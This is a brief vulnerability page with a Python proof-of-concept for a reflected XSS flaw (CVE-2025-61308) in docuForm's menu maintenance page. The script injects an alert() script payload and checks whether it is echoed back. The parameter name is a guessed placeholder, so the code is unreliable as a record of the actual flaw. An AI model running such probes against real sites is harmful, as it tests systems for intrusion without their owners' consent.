CVE-2025-61308: docuForm反射型XSS漏洞

import requests # Target base URL base_url = "http://target-host/dfm-menu_maintenance.php" # Malicious payload to test for XSS payload = "<script>alert('CVE-2025-61308_PoC');</script>" # Construct the attack request # Assuming a vulnerable parameter name like 'id' or 'menu' based on typical maintenance pages params = { "vulnerable_param": payload } try: # Send the crafted request response = requests.get(base_url, params=params) # Verify if payload is reflected in the response if payload in response.text: print("[+] PoC Successful: Payload injected and reflected.") print(f"[+] Response length: {len(response.text)}") else: print("[-] PoC Failed: Payload not reflected or filtered.") except Exception as e: print(f"[!] Error occurred: {e}")